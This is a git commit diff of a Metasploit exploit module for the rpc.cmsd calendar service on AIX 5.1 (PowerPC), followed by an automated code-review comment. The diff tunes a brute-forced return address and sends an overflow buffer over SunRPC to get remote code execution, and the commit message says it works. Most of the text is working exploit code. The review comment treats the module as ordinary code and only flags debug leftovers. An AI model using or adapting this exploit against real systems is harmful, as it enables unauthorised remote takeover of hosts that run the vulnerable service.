it works! don't forget to "set AIX <version>"
git-svn-id: file:///home/svn/framework3/trunk@8421 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4a39cc13f6
commit
40579ce936
|
@ -57,10 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => 'ppc',
|
||||
'Platform' => 'aix',
|
||||
'Ret' => 0xcafebabe,
|
||||
'AIX' => '5.1',
|
||||
'AIX' => '5.1',
|
||||
'Payload' => { 'AIX' => '5.1' },
|
||||
'Bruteforce' =>
|
||||
{
|
||||
#'Start' => { 'Ret' => 0x20230168 },
|
||||
#'Stop' => { 'Ret' => 0x20230168 },
|
||||
'Start' => { 'Ret' => 0x2022dfc8 },
|
||||
'Stop' => { 'Ret' => 0x2022dfc8 },
|
||||
'Step' => 1024
|
||||
|
@ -73,9 +75,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def brute_exploit(brute_target)
|
||||
begin
|
||||
print_status("Trying to exploit rpc.cmsd with address 0x%08x..." % brute_target['Ret'])
|
||||
|
||||
print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
|
||||
|
||||
begin
|
||||
if (not sunrpc_create('udp', 100068, 4))
|
||||
raise RuntimeError, 'sunrpc_create failed'
|
||||
end
|
||||
|
@ -88,15 +91,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sunrpc_call(7, xdr, 2)
|
||||
}
|
||||
|
||||
# debugger attach!
|
||||
#sleep(5)
|
||||
#print_status("ATTACH DEBUGGER NOW!"); sleep(5)
|
||||
|
||||
buf = "\x41" * payload_space
|
||||
buf << [brute_target['Ret']].pack('N')
|
||||
|
||||
xdr = XDR.encode(buf, "")
|
||||
sunrpc_authunix('localhost', 0, 0, [])
|
||||
sunrpc_call(21, xdr, 2)
|
||||
sunrpc_call(21, xdr, 1)
|
||||
|
||||
handler(sunrpc_callsock)
|
||||
sunrpc_destroy
|
||||
|
@ -109,4 +111,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
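Review bot: Commented-out debugging scaffolding (`# debugger attach!`, `#sleep(5)`, `#print_status("ATTACH DEBUGGER NOW!"); sleep(5)`) and the commented-out `#'Start'`/`#'Stop'` pair in the `Bruteforce` hash are carried in committed code. The rendered page has lost its +/- markers, so it is not certain which of these lines are on the new side, but any that survive should be deleted or given a one-line comment saying why they are kept. The commit message's requirement to set the AIX version is not documented anywhere in the visible hunks; a comment beside the `'AIX' => '5.1'` entry, for example `# requires the AIX option to be set (see commit message)`, would record it in the file. `brute_exploit` starts in the second hunk and its rescue/ensure handling lies outside the visible lines, so whether `sunrpc_destroy` runs on the error path cannot be judged from here.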